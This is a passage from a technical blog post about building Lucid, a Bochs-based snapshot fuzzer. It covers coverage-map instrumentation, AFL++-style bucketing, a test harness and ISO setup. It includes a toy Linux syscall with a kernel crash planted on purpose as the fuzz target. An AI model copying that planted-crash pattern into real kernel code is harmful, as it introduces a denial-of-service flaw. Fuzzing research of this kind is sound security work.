    <span class="k">return</span> <span class="n">hash</span> <span class="o">&amp;</span> <span class="p">(</span><span class="n">g_lucid_ctx</span><span class="o">-&gt;</span><span class="n">coverage_map_size</span> <span class="o">-</span> <span class="mi">1</span><span class="p">);</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kr">inline</span> <span class="kt">void</span> <span class="nf">update_coverage_map</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="n">hash</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Get the address of the coverage map</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">g_lucid_ctx</span><span class="p">)</span>
        <span class="k">return</span><span class="p">;</span>

    <span class="kt">uint8_t</span> <span class="o">*</span><span class="n">map_addr</span> <span class="o">=</span> <span class="n">g_lucid_ctx</span><span class="o">-&gt;</span><span class="n">coverage_map_addr</span><span class="p">;</span>

    <span class="c1">// Mark this as hit</span>
    <span class="n">map_addr</span><span class="p">[</span><span class="n">hash</span><span class="p">]</span><span class="o">++</span><span class="p">;</span>

    <span class="c1">// If it's been rolled-over to zero, make it one</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">map_addr</span><span class="p">[</span><span class="n">hash</span><span class="p">]</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">map_addr</span><span class="p">[</span><span class="n">hash</span><span class="p">]</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">bx_instr_cnear_branch_taken</span><span class="p">(</span><span class="kt">unsigned</span> <span class="n">cpu</span><span class="p">,</span> <span class="n">bx_address</span> <span class="n">branch_eip</span><span class="p">,</span> <span class="n">bx_address</span> <span class="n">new_eip</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">uint64_t</span> <span class="n">hash</span> <span class="o">=</span> <span class="n">dbj2_hash</span><span class="p">(</span><span class="n">branch_eip</span><span class="p">,</span> <span class="n">new_eip</span><span class="p">);</span>
    <span class="n">update_coverage_map</span><span class="p">(</span><span class="n">hash</span><span class="p">);</span>
    <span class="c1">//printf("CNEAR TAKEN: (0x%lx, 0x%lx) Hash: 0x%lx\n", branch_eip, new_eip, hash);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">bx_instr_cnear_branch_not_taken</span><span class="p">(</span><span class="kt">unsigned</span> <span class="n">cpu</span><span class="p">,</span> <span class="n">bx_address</span> <span class="n">branch_eip</span><span class="p">,</span> <span class="n">bx_address</span> <span class="n">new_eip</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">uint64_t</span> <span class="n">hash</span> <span class="o">=</span> <span class="n">dbj2_hash</span><span class="p">(</span><span class="n">branch_eip</span><span class="p">,</span> <span class="n">new_eip</span><span class="p">);</span>
    <span class="n">update_coverage_map</span><span class="p">(</span><span class="n">hash</span><span class="p">);</span>
    <span class="c1">//printf("CNEAR NOT TAKEN: (0x%lx, 0x%lx) Hash: 0x%lx\n", branch_eip, new_eip, hash);</span>
<span class="p">}</span>
</code></pre></div></div>
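<p>To sanity-check the index math outside of Bochs, the same logic can be transliterated into Rust. This is only a sketch mirroring the C above; the function names <code class="language-plaintext highlighter-rouge">edge_index</code> and <code class="language-plaintext highlighter-rouge">record_hit</code> are made up here, and the map size is hard-coded rather than read from the Lucid context:</p>

```rust
/// Map size used in this sketch. It must be a power of two, otherwise
/// `hash & (size - 1)` would skip some slots entirely.
pub const COVERAGE_MAP_SIZE: usize = 65536;

/// Rust transliteration of the C hash above (djb2-style: hash * 33 + value),
/// truncating each address to its low 32 bits just like the C casts do.
pub fn edge_index(src: u64, dst: u64) -> usize {
    let mut hash: u32 = 5381;
    hash = (hash << 5).wrapping_add(hash).wrapping_add(src as u32);
    hash = (hash << 5).wrapping_add(hash).wrapping_add(dst as u32);
    (hash as usize) & (COVERAGE_MAP_SIZE - 1)
}

/// Increment the hit count at `index`; if the u8 wraps around to zero,
/// bump it to one so the edge never looks unvisited.
pub fn record_hit(map: &mut [u8], index: usize) {
    map[index] = map[index].wrapping_add(1);
    if map[index] == 0 {
        map[index] = 1;
    }
}
```

<p>One thing this makes easy to see: because of the roll-over handling, an edge that is hit 256 times in one iteration reads back as a count of 1, so very hot edges can show up with a small count.</p>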

<p>Now we have this array of <code class="language-plaintext highlighter-rouge">u8</code> values on the Lucid side to evaluate after each fuzzing iteration. On the Lucid side we need to do a few things:</p>
<ol>
  <li>We need to categorize each <code class="language-plaintext highlighter-rouge">u8</code> into what’s called a <code class="language-plaintext highlighter-rouge">bucket</code>, which is just a range of hits for the edge-pair. For example, hitting the edge-pair 100 times is not much different from hitting the same edge-pair 101 times, so we logically <code class="language-plaintext highlighter-rouge">bucket</code> those two types of coverage data together. They are the same as far as we’re concerned. What we really want are drastic differences. So if we see an edge-pair 1 time vs 1000 times, we want to know that difference. I stole the bucketing logic straight from AFL++ which has empirically tested the best bucketing strategies to get the most valuable feedback for most targets.</li>
  <li>After we transform the raw hit counts to bucket values instead, we’ll want to see if we see any new bucket counts that we haven’t seen before. This means we’ll need to keep a <em>copy</em> of the coverage map around at all times as well. We will walk both of them together. If the current coverage map now has a higher <code class="language-plaintext highlighter-rouge">u8</code> value for an edge-pair than the old coverage map (historical one that tracks all time highs for each index), then we have new coverage results we’re interested in!</li>
</ol>

<p>You can see that logic here:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="c1">// Roughly sort ranges of hitcounts into buckets, based on AFL++ logic</span>
    <span class="nd">#[inline(always)]</span>
    <span class="k">fn</span> <span class="nf">bucket</span><span class="p">(</span><span class="n">hitcount</span><span class="p">:</span> <span class="nb">u8</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">u8</span> <span class="p">{</span>
        <span class="k">match</span> <span class="n">hitcount</span> <span class="p">{</span>
            <span class="mi">0</span> <span class="k">=&gt;</span> <span class="mi">0</span><span class="p">,</span>
            <span class="mi">1</span> <span class="k">=&gt;</span> <span class="mi">1</span><span class="p">,</span>
            <span class="mi">2</span> <span class="k">=&gt;</span> <span class="mi">2</span><span class="p">,</span>
            <span class="mi">3</span> <span class="k">=&gt;</span> <span class="mi">4</span><span class="p">,</span>
            <span class="mi">4</span><span class="o">..=</span><span class="mi">7</span> <span class="k">=&gt;</span> <span class="mi">8</span><span class="p">,</span>
            <span class="mi">8</span><span class="o">..=</span><span class="mi">15</span> <span class="k">=&gt;</span> <span class="mi">16</span><span class="p">,</span>
            <span class="mi">16</span><span class="o">..=</span><span class="mi">31</span> <span class="k">=&gt;</span> <span class="mi">32</span><span class="p">,</span>
            <span class="mi">32</span><span class="o">..=</span><span class="mi">127</span> <span class="k">=&gt;</span> <span class="mi">64</span><span class="p">,</span>
            <span class="mi">128</span><span class="o">..=</span><span class="mi">255</span> <span class="k">=&gt;</span> <span class="mi">128</span><span class="p">,</span>
        <span class="p">}</span>
    <span class="p">}</span>

    <span class="c1">// Walk the coverage map in tandem with the history map looking for new</span>
    <span class="c1">// bucket thresholds for hitcounts or brand new coverage</span>
    <span class="c1">//    </span>
    <span class="c1">// Note: normally I like to write things as naively as possible, but we're</span>
    <span class="c1">// using chained iterator BS because the compiler spits out faster code</span>
    <span class="k">pub</span> <span class="k">fn</span> <span class="nf">update</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="k">self</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="p">(</span><span class="nb">bool</span><span class="p">,</span> <span class="nb">usize</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">let</span> <span class="k">mut</span> <span class="n">new_coverage</span> <span class="o">=</span> <span class="k">false</span><span class="p">;</span>
        <span class="k">let</span> <span class="k">mut</span> <span class="n">edge_count</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

        <span class="c1">// Iterate over the current map that was updated by Bochs during fc</span>
        <span class="k">self</span><span class="py">.curr_map</span><span class="nf">.iter_mut</span><span class="p">()</span>                         

            <span class="c1">// Use zip to add history map to the iterator, now we get tuple back</span>
            <span class="nf">.zip</span><span class="p">(</span><span class="k">self</span><span class="py">.history_map</span><span class="nf">.iter_mut</span><span class="p">())</span>

            <span class="c1">// For the tuple pair</span>
            <span class="nf">.for_each</span><span class="p">(|(</span><span class="n">curr</span><span class="p">,</span> <span class="n">hist</span><span class="p">)|</span> <span class="p">{</span>

                <span class="c1">// If we got a hitcount of at least 1</span>
                <span class="k">if</span> <span class="o">*</span><span class="n">curr</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="p">{</span>

                    <span class="c1">// Convert hitcount into bucket count</span>
                    <span class="k">let</span> <span class="n">bucket</span> <span class="o">=</span> <span class="nn">CoverageMap</span><span class="p">::</span><span class="nf">bucket</span><span class="p">(</span><span class="o">*</span><span class="n">curr</span><span class="p">);</span>

                    <span class="c1">// If the old record for this edge pair is lower, update</span>
                    <span class="k">if</span> <span class="o">*</span><span class="n">hist</span> <span class="o">&lt;</span> <span class="n">bucket</span> <span class="p">{</span>
                        <span class="o">*</span><span class="n">hist</span> <span class="o">=</span> <span class="n">bucket</span><span class="p">;</span>
                        <span class="n">new_coverage</span> <span class="o">=</span> <span class="k">true</span><span class="p">;</span>
                    <span class="p">}</span>

                    <span class="c1">// Zero out the current map for next fuzzing iteration</span>
                    <span class="o">*</span><span class="n">curr</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
                <span class="p">}</span>
            <span class="p">});</span>

        <span class="c1">// If we have new coverage, take the time to walk the map again and </span>
        <span class="c1">// count the number of edges we've hit</span>
        <span class="k">if</span> <span class="n">new_coverage</span> <span class="p">{</span>
            <span class="k">self</span><span class="py">.history_map</span><span class="nf">.iter</span><span class="p">()</span><span class="nf">.for_each</span><span class="p">(|</span><span class="o">&amp;</span><span class="n">hist</span><span class="p">|</span> <span class="p">{</span>
                <span class="k">if</span> <span class="n">hist</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="p">{</span>
                    <span class="n">edge_count</span> <span class="o">+=</span> <span class="mi">1</span><span class="p">;</span>
                <span class="p">}</span>
            <span class="p">});</span>
        <span class="p">}</span> 

        <span class="p">(</span><span class="n">new_coverage</span><span class="p">,</span> <span class="n">edge_count</span><span class="p">)</span>
    <span class="p">}</span>
</code></pre></div></div>
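<p>To make the bucketing concrete, here is a small standalone sketch of the same idea operating on plain slices. The <code class="language-plaintext highlighter-rouge">bucket</code> table is the same as above, while <code class="language-plaintext highlighter-rouge">merge_into_history</code> is a simplified stand-in written for this example (it does not clear the current map or count edges):</p>

```rust
/// Same bucket table as above: collapse raw hit counts into coarse ranges.
fn bucket(hitcount: u8) -> u8 {
    match hitcount {
        0 => 0,
        1 => 1,
        2 => 2,
        3 => 4,
        4..=7 => 8,
        8..=15 => 16,
        16..=31 => 32,
        32..=127 => 64,
        128..=255 => 128,
    }
}

/// Simplified stand-in for `update`: raise each history slot to the bucket
/// of the current hit count and report whether any slot increased.
pub fn merge_into_history(curr: &[u8], hist: &mut [u8]) -> bool {
    let mut new_coverage = false;
    for (c, h) in curr.iter().zip(hist.iter_mut()) {
        let b = bucket(*c);
        if *h < b {
            *h = b;
            new_coverage = true;
        }
    }
    new_coverage
}
```

<p>With an empty history, a run that hits an edge 100 times counts as new coverage (bucket 64). A later run that hits it 101 times lands in the same bucket and is not interesting, while a run that hits it 200 times crosses into bucket 128 and is.</p>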

<p>That’s pretty much it for code coverage feedback: Bochs updates the map from instrumentation hooks in the branching instruction handlers, and then Lucid analyzes the results at the end of a fuzzing iteration and clears the map for the next run. Stolen directly from the AFL universe.</p>

<h1 id="environmenttarget-setup">Environment/Target Setup</h1>
<p>Getting a target set up for a full-system snapshot fuzzer is always going to be a pain. It is going to be so specific to your needs that a generic way to do this type of thing does not exist. It’s essentially the problem of harnessing, which remains unsolved generically. This is where all of the labor is for the end-user of a fuzzer. This is also where all the fun is though, lobotomizing your target so that it can be fuzzed is some of the funnest hacking I’ve ever done.</p>

<p>For Lucid, we need something Bochs can understand. Turns out it can run and boot <code class="language-plaintext highlighter-rouge">iso</code> files pretty easily, and since I’m mostly interested in fuzzing Linux kernel stuff, I decided to make a custom kernel and compile it into an <code class="language-plaintext highlighter-rouge">iso</code> to fuzz with Lucid. This worked extremely well and was very easy once I got the hang of creating <code class="language-plaintext highlighter-rouge">iso</code> files. As for a mature workflow, I think with this type of thing specifically, I would try to do the following:</p>
<ul>
  <li>Iteratively develop your harness/setup in QEMU-system since it’s faster, more mature, easier to use, etc.</li>
  <li>Once completely done with your harness/setup, compile that setup to an <code class="language-plaintext highlighter-rouge">.iso</code> and run it in Lucid for fuzzing</li>
</ul>

<p>That’s at least what I’ll be doing for Linux kernel stuff.</p>

<p>I developed a fun little toy syscall to fuzz as follows:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Crash the kernel</span>
<span class="kt">void</span> <span class="nf">__crash</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
	<span class="n">asm</span> <span class="k">volatile</span><span class="p">(</span><span class="s">"xchgw %sp, %sp"</span><span class="p">);</span>
	<span class="o">*</span><span class="p">(</span><span class="kt">int</span> <span class="o">*</span><span class="p">)</span><span class="mi">0</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Check to see if the input matches our criteria</span>
<span class="kt">void</span> <span class="nf">inspect_input</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">input</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">data_len</span><span class="p">)</span> <span class="p">{</span>
	<span class="c1">// Make sure we have enough data</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">data_len</span> <span class="o">&lt;</span> <span class="mi">6</span><span class="p">)</span>
		<span class="k">return</span><span class="p">;</span>
	
	<span class="k">if</span> <span class="p">(</span><span class="n">input</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="sc">'f'</span><span class="p">)</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">input</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="sc">'u'</span><span class="p">)</span>
			<span class="k">if</span> <span class="p">(</span><span class="n">input</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">==</span> <span class="sc">'z'</span><span class="p">)</span>
				<span class="k">if</span> <span class="p">(</span><span class="n">input</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">==</span> <span class="sc">'z'</span><span class="p">)</span>
					<span class="k">if</span> <span class="p">(</span><span class="n">input</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span> <span class="o">==</span> <span class="sc">'m'</span><span class="p">)</span>
						<span class="k">if</span> <span class="p">(</span><span class="n">input</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span> <span class="o">==</span> <span class="sc">'e'</span><span class="p">)</span>
							<span class="n">__crash</span><span class="p">();</span>

	<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>

<span class="n">SYSCALL_DEFINE2</span><span class="p">(</span><span class="n">fuzzme</span><span class="p">,</span> <span class="kt">void</span> <span class="n">__user</span> <span class="o">*</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="kt">size_t</span><span class="p">,</span> <span class="n">data_len</span><span class="p">)</span>
<span class="p">{</span>
	<span class="kt">char</span> <span class="n">kernel_copy</span><span class="p">[</span><span class="mi">1024</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
	<span class="n">printk</span><span class="p">(</span><span class="s">"Inside fuzzme syscall</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>

	<span class="c1">// Make sure we don't overflow stack buffer</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">data_len</span> <span class="o">&gt;</span> <span class="mi">1024</span><span class="p">)</span>
		<span class="n">data_len</span> <span class="o">=</span> <span class="mi">1024</span><span class="p">;</span>

	<span class="c1">// Copy the user data over</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">copy_from_user</span><span class="p">(</span><span class="n">kernel_copy</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="n">data_len</span><span class="p">))</span>
	<span class="p">{</span>
		<span class="k">return</span> <span class="o">-</span><span class="n">EFAULT</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// Inspect contents to try and crash</span>
	<span class="n">inspect_input</span><span class="p">(</span><span class="n">kernel_copy</span><span class="p">,</span> <span class="n">data_len</span><span class="p">);</span>
	
	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>I just added a new syscall to the kernel called <code class="language-plaintext highlighter-rouge">fuzzme</code> that has a syscall number of <code class="language-plaintext highlighter-rouge">451</code>, and then I compiled a harness and stuffed it in <code class="language-plaintext highlighter-rouge">/usr/bin/harness</code> on the disk of the <code class="language-plaintext highlighter-rouge">iso</code>. I didn’t try to generically find a way to plumb up crashes to Lucid yet, I just put the special NOP instruction for signaling a crash in the <code class="language-plaintext highlighter-rouge">__crash</code> function instead. But with things like KASAN, I’m sure there will be some chokepoint I can use in the future as a catch-all for crashes. Weirdly, detecting crashes is not a trivial problem from the Bochs host level like it is when the kernel sends your program a signal (obviously some kernel oopses will signal your harness if you build it this way).</p>

<p>The harness was simple and was just the following:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/syscall.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp">
</span>
<span class="cp">#define __NR_fuzzme 451
</span>
<span class="cp">#define LUCID_SIGNATURE { 0x13, 0x37, 0x13, 0x37, 0x13, 0x37, 0x13, 0x37, \
                          0x13, 0x38, 0x13, 0x38, 0x13, 0x38, 0x13, 0x38 }
</span>
<span class="cp">#define MAX_INPUT_SIZE 1024UL
</span>
<span class="k">struct</span> <span class="n">fuzz_input</span> <span class="p">{</span>
    <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">signature</span><span class="p">[</span><span class="mi">16</span><span class="p">];</span>
    <span class="kt">size_t</span> <span class="n">input_len</span><span class="p">;</span>
    <span class="kt">char</span> <span class="n">input</span><span class="p">[</span><span class="n">MAX_INPUT_SIZE</span><span class="p">];</span>
<span class="p">};</span>

<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">argv</span><span class="p">[])</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">fuzz_input</span> <span class="n">fi</span> <span class="o">=</span> <span class="p">{</span> 
        <span class="p">.</span><span class="n">signature</span> <span class="o">=</span> <span class="n">LUCID_SIGNATURE</span><span class="p">,</span>
        <span class="p">.</span><span class="n">input_len</span> <span class="o">=</span> <span class="mi">8</span><span class="p">,</span>
    <span class="p">};</span>
    <span class="n">memset</span><span class="p">(</span><span class="o">&amp;</span><span class="n">fi</span><span class="p">.</span><span class="n">input</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="sc">'A'</span><span class="p">,</span> <span class="mi">8</span><span class="p">);</span>

    <span class="c1">// Create snapshot</span>
    <span class="n">asm</span> <span class="k">volatile</span><span class="p">(</span><span class="s">"xchgw %dx, %dx"</span><span class="p">);</span>

    <span class="c1">// Call syscall we're fuzzing</span>
    <span class="kt">long</span> <span class="n">ret</span> <span class="o">=</span> <span class="n">syscall</span><span class="p">(</span><span class="n">__NR_fuzzme</span><span class="p">,</span> <span class="n">fi</span><span class="p">.</span><span class="n">input</span><span class="p">,</span> <span class="o">*</span><span class="p">(</span><span class="kt">size_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">fi</span><span class="p">.</span><span class="n">input_len</span><span class="p">);</span>

    <span class="c1">// Restore snapshot</span>
    <span class="n">asm</span> <span class="k">volatile</span><span class="p">(</span><span class="s">"xchgw %bx, %bx"</span><span class="p">);</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">ret</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">perror</span><span class="p">(</span><span class="s">"Syscall failed"</span><span class="p">);</span>
    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Syscall success</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>I create a 128-bit signature value that Lucid can scan for in Bochs heap memory to locate the fuzzing input and learn its dimensions. Once I find the signature, I can insert inputs into Bochs from Lucid. This is also probably doable by using some Bochs logic to translate guest linear addresses to the physical memory in the host Bochs and then plumbing those values up via GPRs during the snapshot, but I haven’t done a lot of work there yet. The signature approach also seems pretty generic. I’m not sure what people will prefer; we’ll see.</p>
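<p>To make the signature idea concrete, here is a minimal sketch in C of what the scan and input insertion could look like. Lucid itself is written in Rust and its real implementation lives in the repo, so treat this as an illustration only: <code class="language-plaintext highlighter-rouge">find_signature</code> and <code class="language-plaintext highlighter-rouge">insert_input</code> are hypothetical names, and the sketch assumes the whole <code class="language-plaintext highlighter-rouge">struct fuzz_input</code> sits contiguously inside the memory region being scanned.</p>

```c
#include <stddef.h>
#include <string.h>

#define SIG_LEN 16
#define MAX_INPUT_SIZE 1024UL

/* Same layout as the harness's struct fuzz_input. */
struct fuzz_input {
    unsigned char signature[SIG_LEN];
    size_t input_len;
    char input[MAX_INPUT_SIZE];
};

/* Hypothetical helper: linear scan of a memory region for the signature.
 * Returns the offset of the first match, or -1 if there is none. */
static long find_signature(const unsigned char *mem, size_t mem_len,
                           const unsigned char sig[SIG_LEN])
{
    if (mem_len < SIG_LEN)
        return -1;

    for (size_t i = 0; i <= mem_len - SIG_LEN; i++) {
        if (memcmp(mem + i, sig, SIG_LEN) == 0)
            return (long)i;
    }

    return -1;
}

/* Hypothetical helper: overwrite the length and data that follow the
 * signature. Returns 0 on success, -1 if the input would not fit. */
static int insert_input(unsigned char *mem, size_t mem_len, long sig_off,
                        const void *data, size_t data_len)
{
    if (sig_off < 0 || data_len > MAX_INPUT_SIZE)
        return -1;
    if ((size_t)sig_off > mem_len ||
        mem_len - (size_t)sig_off < sizeof(struct fuzz_input))
        return -1;

    unsigned char *base = mem + sig_off;
    memcpy(base + offsetof(struct fuzz_input, input_len),
           &data_len, sizeof(data_len));
    memcpy(base + offsetof(struct fuzz_input, input), data, data_len);
    return 0;
}
```

<p>The scan only has to happen once per snapshot, since the offset of the input stays the same across snapshot restores; after that, each fuzzing iteration is just the two copies in <code class="language-plaintext highlighter-rouge">insert_input</code>.</p>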

<p>You can see the special NOP instructions for taking a snapshot and then restoring a snapshot. So we really only fuzz the <code class="language-plaintext highlighter-rouge">syscall</code> portion of the harness.</p>

<p>I basically followed this tutorial for building an <code class="language-plaintext highlighter-rouge">iso</code> with BusyBox: https://medium.com/@ThyCrow/compiling-the-linux-kernel-and-creating-a-bootable-iso-from-it-6afb8d23ba22. I compiled the harness statically and copied it into <code class="language-plaintext highlighter-rouge">/usr/bin/harness</code>, so I can run it from vanilla Bochs with a GUI and save the Bochs state to disk at the snapshot point we want to fuzz from.</p>

<p>I added my custom syscall to the Linux kernel at <code class="language-plaintext highlighter-rouge">kernel/sys.c</code> at the bottom of the source file for kernel version <code class="language-plaintext highlighter-rouge">6.0.1</code>, and I added the harness to <code class="language-plaintext highlighter-rouge">/usr/bin/harness</code> in the <code class="language-plaintext highlighter-rouge">initramfs</code> from the tutorial. My file hierarchy for the <code class="language-plaintext highlighter-rouge">iso</code> when I went to create it is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>iso_files
  - boot
    - bzImage
    - initramfs.cpio.gz
    - grub
      - grub.cfg
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">bzImage</code> is the compiled kernel image. <code class="language-plaintext highlighter-rouge">initramfs.cpio.gz</code> is the compressed <code class="language-plaintext highlighter-rouge">initramfs</code> file system we want in the virtual machine; you can create it by navigating to its root and doing something like <code class="language-plaintext highlighter-rouge">find . | cpio -o -H newc | gzip &gt; /path/to/iso_files/boot/initramfs.cpio.gz</code>.</p>

<p>The contents of my <code class="language-plaintext highlighter-rouge">grub.cfg</code> file looked like this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>set default=0
set timeout=10
menuentry 'Lucid Linux' --class os {
    insmod gzio
    insmod part_msdos
    linux /boot/bzImage
    initrd /boot/initramfs.cpio.gz
}
</code></pre></div></div>

<p>Pointing <code class="language-plaintext highlighter-rouge">grub-mkrescue</code> at the <code class="language-plaintext highlighter-rouge">iso_files</code> dir will have it spit out the <code class="language-plaintext highlighter-rouge">iso</code> we want to run in Bochs: <code class="language-plaintext highlighter-rouge">grub-mkrescue -o lucid_linux.iso iso_files/</code>.</p>

<p>Here is what everything looks like from start to finish when you run the environment:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">devbox:~/git_bochs/Bochs/bochs]$</span><span class="w"> </span>/tmp/gui_bochs <span class="nt">-f</span> bochsrc_gui.txt
<span class="go">========================================================================
                     Bochs x86 Emulator 2.8.devel
             Built from GitHub snapshot after release 2.8
                  Compiled on Jun 21 2024 at 14:42:29
========================================================================
00000000000i[      ] BXSHARE not set. using compile time default '/usr/local/share/bochs'
00000000000i[      ] reading configuration from bochsrc_gui.txt
------------------------------
Bochs Configuration: Main Menu
------------------------------

This is the Bochs Configuration Interface, where you can describe the
machine that you want to simulate.  Bochs has already searched for a
configuration file (typically called bochsrc.txt) and loaded it if it
could be found.  When you are satisfied with the configuration, go
ahead and start the simulation.

You can also start bochs with the -q option to skip these menus.

1. Restore factory default configuration
2. Read options from...
3. Edit options
4. Save options to...
5. Restore the Bochs state from...
6. Begin simulation
7. Quit now

Please choose one: [6] 
</span></code></pre></div></div>

<p>We’ll want to just begin simulation, so enter 6 here. When we do, we should eventually land on this GRUB screen to choose what to boot into, where we just select <code class="language-plaintext highlighter-rouge">Lucid Linux</code>:</p>

<p><img src="/assets/images/pwn/BootBochs.PNG" alt="Bochs Boot" /></p>

<p>Once we boot and get our shell, I just have to call <code class="language-plaintext highlighter-rouge">harness</code> from the command line, since it’s automatically in my <code class="language-plaintext highlighter-rouge">$PATH</code>, and save the Bochs state to disk!</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Please choose one: [6] 6
00000000000i[      ] installing sdl2 module as the Bochs GUI
00000000000i[SDL2  ] maximum host resolution: x=1704 y=1439
00000000000i[      ] using log file bochsout.txt
Saving Lucid snapshot to '/tmp/lucid_snapshot'...
Successfully saved snapshot
</code></pre></div></div>

<p>Now, <code class="language-plaintext highlighter-rouge">/tmp/lucid_snapshot</code> has all of the information to resume this saved Bochs state inside Lucid’s Bochs. We just need to go and comment out the display library line from <code class="language-plaintext highlighter-rouge">/tmp/lucid_snapshot/config</code> as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># configuration file generated by Bochs
plugin_ctrl: unmapped=true, biosdev=true, speaker=true, extfpuirq=true, parallel=true, serial=true, e1000=false
config_interface: textconfig
#display_library: sdl2
</code></pre></div></div>

<p>Next, we just have to run Lucid and give it the right Bochs arguments to resume that saved state from disk:
<code class="language-plaintext highlighter-rouge">./lucid --input-signature 0x13371337133713371338133813381338 --verbose --bochs-image /tmp/lucid_bochs --bochs-args -f /home/h0mbre/git_bochs/Bochs/bochs/bochsrc_nogui.txt -q -r /tmp/lucid_snapshot</code></p>
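<p>Note that the hex string passed to <code class="language-plaintext highlighter-rouge">--input-signature</code> lists the same 16 bytes, in the same order, as <code class="language-plaintext highlighter-rouge">LUCID_SIGNATURE</code> in the harness. As a rough sketch of that mapping (Lucid does its own argument parsing in Rust, so <code class="language-plaintext highlighter-rouge">parse_signature</code> here is a hypothetical helper, and the in-order byte layout is an assumption based on the two values lining up), converting the argument to a byte array in C could look like this:</p>

```c
#include <stddef.h>
#include <string.h>

#define SIG_LEN 16

/* Convert one hex digit to its value, or -1 if it is not a hex digit. */
static int hex_nibble(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Hypothetical helper: parse an optional "0x" prefix followed by exactly
 * 32 hex digits into 16 bytes. The first digit pair becomes byte 0, so the
 * result matches the order the bytes appear in memory.
 * Returns 0 on success, -1 on malformed input. */
static int parse_signature(const char *arg, unsigned char out[SIG_LEN])
{
    if (strncmp(arg, "0x", 2) == 0 || strncmp(arg, "0X", 2) == 0)
        arg += 2;

    if (strlen(arg) != SIG_LEN * 2)
        return -1;

    for (size_t i = 0; i < SIG_LEN; i++) {
        int hi = hex_nibble(arg[2 * i]);
        int lo = hex_nibble(arg[2 * i + 1]);
        if (hi < 0 || lo < 0)
            return -1;
        out[i] = (unsigned char)((hi << 4) | lo);
    }

    return 0;
}
```

<p>Parsing digit pairs in order, rather than treating the value as one big integer, sidesteps any endianness questions when comparing against guest memory.</p>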

<p>Here are the contents of those configuration files, both for the GUI vanilla Bochs, and the one we pass here to Lucid’s Bochs, the only difference is the commented out display library line:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>romimage: file="/home/h0mbre/git_bochs/Bochs/bochs/bios/BIOS-bochs-latest"
